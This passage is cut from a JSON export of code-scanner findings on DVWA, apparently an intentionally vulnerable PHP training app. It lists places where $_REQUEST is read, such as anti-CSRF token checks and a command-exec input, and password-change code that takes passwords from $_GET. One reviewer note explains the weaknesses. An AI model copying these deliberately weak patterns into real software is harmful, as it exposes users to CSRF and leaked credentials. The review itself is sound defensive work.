class=\"line-number\">65:</span> \t\t\t<span class=\"token string\">'COOKIE'</span>  <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token variable\">$_COOKIE</span>\n<span 
class=\"line-number\">66:</span> \t\t<span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">67:</span> ",
  "line": 62,
  "start": 57,
  "end": 68,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 46,
  "file": "/home/chris/src/DVWA-master/login.php",
  "filetype": "php",
  "search": "\\s\\$_REQUEST",
  "match": "<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> <span class=\"token function\">dvwaDatabaseConnect</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \n<span class=\"line-number\">10:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Login'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Anti<span class=\"token operator\">-</span>CSRF\n<span class=\"highlight\"><span class=\"line-number\">12:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'login.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">13:</span> \n<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span 
class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token 
punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">17:</span> ",
  "line": 12,
  "start": 7,
  "end": 18,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 54,
  "file": "/home/chris/src/DVWA-master/security.php",
  "filetype": "php",
  "search": "\\s\\$_REQUEST",
  "match": "<span class=\"line-number\">10:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'page_id'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">'security'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \n<span class=\"line-number\">12:</span> <span class=\"token variable\">$securityHtml</span> <span class=\"token operator\">=</span> <span class=\"token string\">''</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span><span class=\"token string\">'seclev_submit'</span><span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">14:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Anti<span class=\"token operator\">-</span>CSRF\n<span class=\"highlight\"><span class=\"line-number\">15:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'security.php'</span> <span class=\"token punctuation\">)</span><span 
class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">16:</span> \n<span class=\"line-number\">17:</span> \t<span class=\"token variable\">$securityLevel</span> <span class=\"token operator\">=</span> <span class=\"token string\">''</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token function\">switch</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'security'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">19:</span> \t\t<span class=\"token keyword\">case</span> <span class=\"token string\">'low'</span><span class=\"token punctuation\">:</span>\n<span class=\"line-number\">20:</span> \t\t\t<span class=\"token variable\">$securityLevel</span> <span class=\"token operator\">=</span> <span class=\"token string\">'low'</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 15,
  "start": 10,
  "end": 21,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 57,
  "file": "/home/chris/src/DVWA-master/setup.php",
  "filetype": "php",
  "search": "\\s\\$_REQUEST",
  "match": "<span class=\"line-number\">9:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span>   <span class=\"token operator\">=</span> <span class=\"token string\">'Setup'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title_separator'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span><span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'page_id'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">'setup'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \n<span class=\"line-number\">12:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'create_db'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">13:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Anti<span class=\"token operator\">-</span>CSRF\n<span class=\"highlight\"><span class=\"line-number\">14:</span> \t<span class=\"token function\">checkToken</span><span class=\"token 
punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'setup.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">15:</span> \n<span class=\"line-number\">16:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$DBMS</span> <span class=\"token operator\">==</span> <span class=\"token string\">'MySQL'</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">17:</span> \t\tinclude_once DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">'dvwa/includes/DBMS/MySQL.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">18:</span> \t}\n<span class=\"line-number\">19:</span> \t<span class=\"token function\">elseif</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$DBMS</span> <span class=\"token operator\">==</span> <span class=\"token string\">'PGSQL'</span><span class=\"token punctuation\">)</span> {",
  "line": 14,
  "start": 9,
  "end": 20,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 66,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/brute/source/high.php",
  "filetype": "php",
  "search": "\\s\\$_REQUEST",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Login'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise username input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span 
class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token 
punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 5,
  "start": 1,
  "end": 11,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 73,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/brute/source/impossible.php",
  "filetype": "php",
  "search": "\\s\\$_REQUEST",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Login'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise username input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span 
class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token 
punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 5,
  "start": 1,
  "end": 11,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 108,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/impossible.php",
  "filetype": "php",
  "search": "\\s\\$_REQUEST",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Hide the CAPTCHA form\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$hide_form</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">true</span><span class=\"token comment\" 
spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \n<span class=\"line-number\">10:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input",
  "line": 5,
  "start": 1,
  "end": 11,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 145,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/high.php",
  "filetype": "php",
  "search": "\\s\\$_REQUEST",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass_new</span>  <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token 
string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> ",
  "line": 5,
  "start": 1,
  "end": 11,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 154,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/impossible.php",
  "filetype": "php",
  "search": "\\s\\$_REQUEST",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token 
string\">'password_current'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass_new</span>  <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 5,
  "start": 1,
  "end": 11,
  "severity": "unknown",
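  "note": "Line 5 reads the anti-CSRF token from $_REQUEST, so it is accepted from any request source PHP merges into that array rather than only from the submitted form; reading it from the superglobal the form actually uses is stricter. Lines 8-10 take the current and new passwords from $_GET, which places them in the URL where they can end up in server logs and browser history."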
 },
 {
  "id": 178,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/exec/source/impossible.php",
  "filetype": "php",
  "search": "\\s\\$_REQUEST",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span>  <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$target</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token 
string\">'ip'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$target</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$target</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> ",
  "line": 5,
  "start": 1,
  "end": 11,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 179,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/exec/source/impossible.php",
  "filetype": "php",
  "search": "\\s\\$_REQUEST",
  "match": "<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span>  <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">8:</span> \t<span class=\"token variable\">$target</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'ip'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">9:</span> 
